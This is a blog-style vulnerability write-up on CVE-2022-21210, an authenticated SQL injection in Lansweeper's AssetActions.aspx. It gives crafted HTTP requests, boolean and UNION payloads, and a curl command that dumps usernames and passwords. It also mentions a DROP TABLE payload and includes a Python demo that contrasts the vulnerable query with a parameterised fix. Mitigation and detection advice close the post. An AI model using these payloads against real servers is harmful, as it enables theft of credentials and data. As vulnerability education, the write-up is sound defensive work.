CVE-2022-21210 is a high-severity SQL injection vulnerability in Lansweeper version 9.1.20.2, located in the AssetActions.aspx page. An attacker who holds valid login credentials can execute attacker-chosen SQL against the Lansweeper database by sending a specially crafted HTTP request to that page.
In this long read we'll break down what the vulnerability is, how it works, walk through a practical exploit example with code, and list resources for further reading. If you're running Lansweeper 9.1.20.2 or earlier, you need to understand and address this risk now.
CVSS Score: ~8 (High; the requirement for a valid account is what keeps it out of the Critical range)
SQL injection occurs when user-supplied input is unsafely concatenated into database queries. Here, attackers can exploit the way AssetActions.aspx processes HTTP parameters to run unauthorized SQL commands, just by being logged in.
Vulnerable Endpoint
POST /AssetActions.aspx
The Problem
The page expects various POST parameters, such as AssetID, and uses them in SQL statements without validating them or binding them as query parameters.
Example vulnerable code logic (pseudo-code, not Lansweeper's actual source)
// C#
string assetId = Request["AssetID"];                              // attacker-controlled, never validated
string query = "SELECT * FROM Assets WHERE AssetID = " + assetId; // input concatenated into the SQL text
using (var cmd = new SqlCommand(query, connection))               // the whole string, payload included,
using (var reader = cmd.ExecuteReader()) { /* ... */ }            // is handed to SQL Server and executed
Notice: By injecting SQL syntax into the AssetID field, you can manipulate the SQL query.
Let's look at what an attacker might do.
Suppose you’re logged in as a normal user. Using a tool like Burp Suite or curl, you intercept a POST request to /AssetActions.aspx when performing any asset action.
A normal POST that triggers an action might look like this (the parameter names follow the illustrative pseudo-code above; the real form fields may differ):
POST /AssetActions.aspx HTTP/1.1
Host: your.lansweeper.server
Cookie: ASP.NET_SessionId=...
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

AssetID=1234&Action=delete
To test for SQL injection, do not start with a destructive stacked query such as AssetID=1234; DROP TABLE Users;--. SQL Server, which Lansweeper uses, does execute stacked statements, so a payload like that can really destroy data, and it proves nothing that a read-only probe cannot. Start with a boolean pair instead; if the two responses differ, the input is reaching the WHERE clause unquoted:
AssetID=1234 AND 1=1&Action=delete
AssetID=1234 AND 1=2&Action=delete
To extract data, a UNION-based payload appends rows from another table. The number and types of the selected columns must match what the original SELECT returns (walk ORDER BY 1, ORDER BY 2, ... until the query errors to find the count), and the table and column names here are illustrative, not Lansweeper's real schema:
AssetID=1234 UNION SELECT 1,username,password FROM Users--&Action=delete
When the payload goes into a form body it must be URL-encoded (space as + or %20, semicolon as %3B); the raw forms above are what the server sees after decoding.
Full Example Using curl
curl -k "https://your.lansweeper.server/AssetActions.aspx" \
  -H "Cookie: ASP.NET_SessionId=YOURSESSIONID" \
  --data-urlencode "AssetID=1234 UNION SELECT 1,username,password FROM Users--" \
  --data-urlencode "Action=delete"
--data-urlencode encodes the value for you (plain -d sends the spaces and semicolons raw), and sending a body already makes curl use POST. -k skips certificate validation and belongs only in a lab with a self-signed certificate.
If the endpoint is injectable, the response, or the page it renders, will contain rows that do not belong to asset 1234, including whatever the UNION pulled from the other table, up to and including password hashes.
Step by Step
1. Log in to Lansweeper as a normal (non-admin) user.
2. Go to any asset management page, trigger an asset action, and intercept the resulting POST to /AssetActions.aspx with Burp Suite, Fiddler, or the browser's developer tools.
3. Replace the AssetID value with a test payload (a non-destructive AND 1=1 / AND 1=2 pair first, then ORDER BY and UNION) and resend the request with Burp Repeater or curl.
4. Compare the responses: rows that do not belong to the asset you started from mean the input reached the query as SQL.
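The flaw and the test procedure above, as an added example that is not Lansweeper's code and not part of the original post: the concatenated query from the pseudo-code next to its parameterised fix, and the read-only probes a tester would actually send (boolean differential, ORDER BY column counting, UNION extraction) run against both. SQLite stands in for Lansweeper's SQL Server database; the Assets and Users tables, their columns, the sample rows and the hash values are all constructed for the demo, and the real Lansweeper schema is not shown on this page.

```python
"""Added example (not Lansweeper's code, not from the original post).

Models the AssetActions.aspx flaw: user input concatenated into SQL versus a
parameterised query, plus the read-only probes a tester would send. SQLite
stands in for Lansweeper's SQL Server database; the Assets/Users tables,
their columns and the hash values are constructed for the demo.
"""
import sqlite3
from urllib.parse import urlencode


def build_db() -> sqlite3.Connection:
    """In-memory stand-in database populated with constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Assets (AssetID INTEGER, AssetName TEXT, IPAddress TEXT);
        INSERT INTO Assets VALUES (1234, 'WS-FINANCE-01', '10.0.0.12');
        INSERT INTO Assets VALUES (1235, 'SRV-DC-01', '10.0.0.5');
        CREATE TABLE Users (UserID INTEGER, Username TEXT, PasswordHash TEXT);
        INSERT INTO Users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO Users VALUES (2, 'helpdesk', '8d969eef6ecad3c29a3a629280e686cf');
    """)
    return con


def vulnerable_lookup(con, asset_id: str) -> list:
    """Mirrors the pseudo-code: the raw parameter is concatenated into the SQL.
    (sqlite3 refuses stacked statements, so '; DROP TABLE' would not run here;
    SQL Server executes stacked queries, so against Lansweeper it would.)"""
    query = "SELECT * FROM Assets WHERE AssetID = " + asset_id
    return con.execute(query).fetchall()


def fixed_lookup(con, asset_id: str) -> list:
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        value = int(asset_id)
    except ValueError:
        raise ValueError("AssetID must be an integer") from None
    return con.execute("SELECT * FROM Assets WHERE AssetID = ?", (value,)).fetchall()


def form_body(asset_id: str, action: str = "delete") -> str:
    """Encode the POST body the way a browser would (spaces, ';' and ',' escaped)."""
    return urlencode({"AssetID": asset_id, "Action": action})


def boolean_probe(lookup, con, base: str = "1234") -> bool:
    """Read-only check: a true and a false condition must give different
    results if the input reaches the WHERE clause unquoted."""
    try:
        true_rows = lookup(con, f"{base} AND 1=1")
        false_rows = lookup(con, f"{base} AND 1=2")
    except (ValueError, sqlite3.Error):
        return False  # rejected or errored: no evidence of injection
    return true_rows != false_rows


def column_count(lookup, con, base: str = "1234", limit: int = 20) -> int:
    """ORDER BY n errors once n exceeds the column count of the original SELECT;
    a UNION has to match that count. Returns 0 when nothing can be injected."""
    for n in range(1, limit + 1):
        try:
            lookup(con, f"{base} ORDER BY {n}")
        except (ValueError, sqlite3.Error):
            return n - 1
    return limit


def union_dump(lookup, con, ncols: int, base: str = "1234") -> dict:
    """UNION rows from Users onto the Assets result. NULL goes in the integer
    column so the types line up (SQL Server rejects text in an int column)."""
    selected = ["NULL", "Username", "PasswordHash"] + ["NULL"] * (ncols - 3)
    payload = f"{base} UNION SELECT {', '.join(selected)} FROM Users--"
    rows = lookup(con, payload)
    # Rows that came from Users carry NULL where a real asset has its AssetID.
    return {row[1]: row[2] for row in rows if row[0] is None}


if __name__ == "__main__":
    db = build_db()
    print("encoded body:", form_body("1234 AND 1=1"))
    for name, lookup in (("vulnerable", vulnerable_lookup), ("fixed", fixed_lookup)):
        injectable = boolean_probe(lookup, db)
        print(f"{name}: injectable={injectable}")
        if injectable:
            n = column_count(lookup, db)
            print(f"  columns={n} dumped={union_dump(lookup, db, n)}")
```

Against the concatenating handler the boolean pair differs, ORDER BY finds three columns, and the UNION returns both constructed hashes; against the parameterised handler every probe is rejected at the int() check before any SQL runs, which is the whole point of binding typed parameters rather than sanitising strings.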
Mitigation
- Upgrade Lansweeper to a release that fixes CVE-2022-21210 (check the Lansweeper changelog and security advisory for the exact version).
- Until you can patch, shrink the pool of accounts that can reach the web console: the bug needs a valid login, so every dormant or over-provisioned account is attack surface.
- Check IIS/web server logs for POSTs to /AssetActions.aspx whose parameters contain SQL keywords (UNION, ORDER BY, WAITFOR, --); that is the cheapest retrospective detection available.
- General SQL Server hardening rather than anything specific to this CVE: give the login the Lansweeper web application uses only the rights it needs, so an injected query cannot reach other databases or server-level features such as xp_cmdshell.
- If you maintain similar ASP.NET code yourself: build queries with SqlCommand parameters of the right type, never by string concatenation.
References
- CVE-2022-21210 at NIST
- Lansweeper Official Site
- PortSwigger SQLi Cheat Sheet
- Lansweeper Security Advisory
- OWASP SQL Injection Guide
Final Thoughts
SQL injection remains one of the most widespread and dangerous web vulnerabilities. CVE-2022-21210 is particularly impactful because Lansweeper is widely deployed IT inventory software that sits on privileged network data. The flaw does require a login, but many organizations hand out Lansweeper accounts to a large number of staff, so "authenticated" is a weak barrier in practice.
If you use Lansweeper:
Patch now, audit user access, and consider regular security reviews of all business-critical software.
Disclaimer:
This post is for educational purposes only. Test only in environments you are authorized to access.
Timeline
Published on: 04/14/2022 20:15:00 UTC
Last modified on: 04/21/2022 15:58:00 UTC